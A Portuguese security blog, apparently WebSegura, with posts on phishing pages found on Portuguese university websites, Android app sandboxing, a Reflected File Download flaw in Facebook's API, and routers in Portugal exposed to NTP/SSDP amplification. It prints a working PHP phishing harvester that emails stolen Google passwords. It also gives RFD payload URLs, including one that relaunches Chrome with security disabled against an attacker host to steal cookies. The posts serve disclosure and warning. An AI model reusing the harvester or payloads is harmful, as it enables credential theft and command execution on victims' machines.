Universidade Nova de Lisboa aloja página de Phishing

ataque_alerta

Recentemente publiquei que a Universidade do Porto estava alojar uma página de Phishing.
Hoje deparei-me com um alerta de uma nova universidade com uma página de Phishing ao Yahoo.

Desta vez trata-se da página do Estudo Interdisciplinar de Comunidades Alto Medievais – http://eicam-iem.fcsh.unl.pt/. Este site é um projecto centrado na região de Viseu, desenvolvido no âmbito do Instituto de Estudos Medievais da FCSH/UNL. É também financiado pela Fundação Calouste Gulbenkian.

eicam-iem.fcsh.unl.pt/wetindeyhappen/Indezx.html

A página de Phishing mostra uma cópia da página de autenticação do Yahoo! onde a vítima ao enviar o seus dados, está a enviar um pedido ao script PHP alojado no servidor loja – Loginc.php que envia um email com os dados para o utilizador malicioso.

yahoo_phishing

Um pouco estranho é que a página está alojada no wix.com.

Até à data deste artigo, a página de Phishing ainda está online.

Segurança na plataforma Android

web-android

Olá a todos. O WebSegura lançou-me o desafio de falar um pouco sobre segurança na plataforma Android.

Os comentários seguintes vou baseá-los na minha experiência profissional enquanto Penetration Tester na Integrity S.A, onde muito frequentemente faço análise de aplicações mobile, bem como enquanto power user, dado que é a minha plataforma de eleição nos meus dispositivos móveis.

Confio na plataforma, considero que tem implementado um conjunto de mecanismos que garantem um bom nível de segurança para o utilizador, dos quais destaco o Application Sandboxing.

Imaginemos o cenário em que uma aplicação maliciosa tem como objectivo extrair informação do utilizador para o exterior. Sem o mecanismo de sandboxing, essa aplicação poderia facilmente navegar pelo sistema de ficheiros de outras aplicações e extrair essa informação sem o utilizador ter qualquer noção. Passo a detalhar o mecanismo.

O sistema automaticamente associa um user ID (UID) a cada nova aplicação no momento da sua instalação e a execução da aplicação é feita num processo dedicado associado ao seu UID. É também atribuída uma directoria dedicada no sistema de ficheiros onde apenas a aplicação em causa tem permissões de leitura e escrita. Cada directoria é criada com o nome do package da aplicação em notação reverse domain name, por exemplo: com.android.email. Podemos encontrar cada uma dessas directorias no sistema de ficheiros em /data/data/.

data_data

Com estes dois mecanismos as aplicações estão isoladas tanto ao nível do processo (cada aplicação é executada no seu processo) bem como ao nível do sistema de ficheiros (cada aplicação possui uma directoria própria), fazendo com que desta maneira uma aplicação maliciosa não possa interagir com outras aplicações ou aceder aos seus dados directamente.

android

Mas nem tudo são coisas boas.

Existem claro excepções à regra, quando por exemplo, aplicações mal desenhadas expõem métodos sem as devidas restrições, que permitem outras aplicações acederem ás suas funcionalidades e dados, invalidando o modelo de sandboxing. Outro exemplo serão também aplicações maliciosas que exploram falhas no sistema e que lhes permite escalar privilégios para root e aí têm capacidade de fazer bypass ao modelo de sandboxing, dado que o utilizador root terá privilégios sobre todo o sistema de ficheiros.

Existe a questão da fragmentação das versões dos sistemas operativos, na qual os fabricantes têm a sua quota parte de responsabilidade, fazendo com que versões de sistema operativos mais recentes não cheguem a certos equipamentos, apesar de a nível de hardware serem capazes de suportar versões mais recentes, fazendo com que milhares de equipamentos estejam vulneráveis a certo tipo de falhas que foram corrigidas em versões superiores. O controlo / validação por parte da Store no momento em que novas apps são submetidas necessita de ser melhorado e mais eficaz, de modo a que o número de apps maliciosas reduza. Dado esse controlo por vezes não ser eficaz, o utilizador tem um papel muito importante.

Para além de todas as seguranças que o fabricante possa implementar, o utilizador deve utilizar outro mecanismo de segurança que se chama Bom Senso.
Antes da instalação de qualquer tipo de app, há que analisar o tipo de permissões que são necessárias para a mesma, o tipo de reviews, perceber quem é a entidade que está responsável pela app e até uma pesquisa rápida por vulnerabilidades que possam ser conhecidas naquela app e depois dessa análise usar o bom senso e decidir se a relação risco / benefício é aceitável.É preciso bastante cuidado também com as fontes de onde são instaladas estas aplicações. Instalação de apps provenientes de outras apps stores onde possa não haver controlo e validação do seu conteúdo bem como de apps de fontes desconhecidas é bastante perigoso.

Espero que tenha ajudado a compreender um pouco mais como funciona a plataforma. Nunca é de mais repetir que independentemente de todas os mecanismos de segurança que possam existir, há que haver uma análise cuidada da nossa parte antes de qualquer instalação.

Para todos os que gostariam de aprofundar conhecimento na plataforma Android e em especial no tema da segurança, aconselho a leitura dos livros Android Hacker’s Handbook e Android Security Internals. À data da escrita deste artigo estamos a dias da disponibilização de outro livro, o The Mobile Application Hacker’s Handbook, que pelo conteúdo e pelos colaboradores no livro será sem dúvida obrigatório.

Site da Universidade do Porto aloja página de Phishing

contas_google_phishing

O site do Centro de Educação Médica do Departamento da Faculdade de Medicina da Universidade do Porto – http://cem.med.up.pt está alojar uma página que está a ser utilizada para Phishing de contas do Google.

O endereço afetado continua ativo e foi divulgado na base de dados Clean-MX.

http://cem.med.up.pt/images/banners/Domain/

Dado à possibilidade de listagens de ficheiros do servidor web, é possível descarregar o ficheiro [inserido em 17 de Fevereiro de 2015] utilizado pelo utilizador malicioso, no qual divulgo:

<?php

$ip = getenv("REMOTE_ADDR");
$message .= "------------------------------------------------------------------\n";
$message .= "Email ID: ".$_POST['Email']."\n";
$message .= "Password: ".$_POST['emailpassword']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Created By Lord PoPpA-----------------------------\n";

$recipient = "juwonlo7@XXXXXXXXXXX";
$subject = "TRANSACTION LOGIN";
$headers = "From: DOMAIN";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: https://www.bluehost.com/");

}
else
{
echo "ERROR! Please go back and try again.";
}
?>

De referir que o site corre Joomla! e poderá ter sido essa a porta de entrada da intrusão.
Uma cópia desta informação foi enviada ao report @cert.pt para uma possível resolução.

Facebook vulnerável a uma falha grave

facebook

A maior rede social do planeta está vulnerável a uma falha RFDReflected File Download – que permite a um utilizador malicioso obter controlo do sistema operativo da vítima. Com este tipo de vulnerabilidade, divulgada por Oren Hafif em Outubro de 2014, um utilizador pode enviar um link malicioso para um dominio confiável [neste caso o Facebook.com] e forçar um download nesse dominio confiável. Depois de executado, o utilizador malicioso pode executar qualquer comando do sistema operativo com o nível de permissão atual do utilizador [mais uma razão para que não navegue na web como administrador].

Mohamed Ramadan testou esta falha no Facebook e conseguiu replicar um RFD.
Os testes de demonstração da falha do Mohamed conseguem abrir a calculadora do Windows[1], o Paint[2] e num último exemplo, fechar o browser Chrome e reiniciá-lo com o modo segurança inativo para roubar os cookies do utilizador[3].

[1] https://api.facebook.com/method/update.bat?q=AttackSecure%22;||calc||&format=json

[2] https://api.facebook.com/method/update.bat?q=AttackSecure%22;||mspaint||&format=json

[3] https://api.facebook.com/method/Update.cmd?q=UpdateChrome%22;||taskkill /F /IM ch*|md||start chrome http://attacker-secure.com/ –disable-web-security –disable-popup-blocking||&format=json

fb-rfd-2

O autor desta descoberta testou todos estes exemplos no Windows 7 com o Internet Explorer 9, embora refira que também é possível executar com o Firefox, Chrome e Opera.

Fica aqui referência também ao vídeo que demonstra esta falha:

Pessoalmente experimentei com o IE8 e o IE11 e não foi possível executar o ataque. No entanto, com o IE9 no Windows Vista e Windows 7 correu o ataque sem problema.

Segundo a site do Mohamed, a resposta do Facebook a esta vulnerabilidade foi a seguinte:

Thanks for your report. This is a technique that has been reported before. It’s not fully fixable at present, at least for the general case, but we’re looking into ways to rectify it globally going forward. For now it’s a known risk and not eligible for a bug bounty reward. We do have mechanisms in place to monitor and mitigate abuse.

Isto é um grande risco de segurança para os todos utilizadores desta rede social. Fica a dica de verificarem sempre os links que vos enviam. Será uma questão de tempo até que utilizadores maliciosos comecem a usar este tipo de vulnerabilidade para propagar malware.

17.000 dispositivos vulneráveis a ataques em Portugal

ntp_map_portugal_2

Com base nos últimos artigos que tenho escrito, tanto no WebSegura, como no Tek Sapo, decidi obter mais informação sobre algumas falhas em routers em Portugal. Foquei-me inteiramente nos protocolos NTP e SSDP, visto serem neste momento bastante utilizados como plataforma para amplificação de ataques DDoS.

Nesta investigação, e com dados recolhidos entre os dias 11 e 12 deste mês no projeto ShadowServer Foundation, concluí que existem cerca de 17.491 dispositivos alegadamente vulneráveis a ataques NTP e SSDP/UPnP em Portugal.

No topo dos ISPs com mais dispositivos vulneráveis, está a VODAFONE, logo seguido pela MEO e a TVCABO.

Elaborei dois gráficos para melhor ilustrar os ISPs afetados em Portugal.

TOP10 dos ISPs vulneráveis ao NTP em Portugal

grafico_ntp

Num total de 12010 ocorrências [o gráfico apenas ilustra o total do Top10] – https://ntpscan.shadowserver.org/

TOP10 dos ISPs vulneráveis ao SSDP em Portugal

ssdp_portugal_grafico

Num total de 5481 ocorrências [o gráfico apenas ilustra o total do Top10] – https://ssdpscan.shadowserver.org/

Só para ter ideia do tipo de amplificação dos ataques SSDP, se for feito um pedido de 64 bytes ao serviço, a resposta é de 3283 bytes. Ou seja, uma amplificação de cerca de 50x.
Geralmente os utilizadores maliciosos utilizam pedidos M-SEARCH numa determinada gama de IPs. Se o dispositivo SSDP/UPnP responder ao pedido com a descrição do dispositivo, então está vulnerável. Com base nestas respostas, os utilizadores elaboram uma lista de dispositivos vulneráveis para posteriormente criarem botnets ou booters.

O projeto Shadowserver Foundation tem como objectivo pesquisar e identificar dispositivos com os serviços NTP e SSDP abertos e disponíveis.
Posteriormente contatam os responsáveis para uma resolução.

Gostava também de salientar que o Brasil é atualmente o 8º país no mundo com mais dispositivos NTP abertos (118.030 ocorrências) e 7º em relação ao SSDP (395.251 ocorrências). De facto são números assustadores.

Embora os utilizadores possam, na maioria dos casos, recorrer ao painel de administração dos dispositivos e desligar os serviços que que não utiliza, o papel deveria ser implementado pelo ISPs. Uma pequena GRANDE atenção que os ISPs poderiam dar aos seus clientes, seria fornecer um manual de segurança ou uma newsletter mensal [ou imediata assim que aparecer uma falha crítica] com informação de segurança, qualquer um deles seria positivo para uma web mais segura.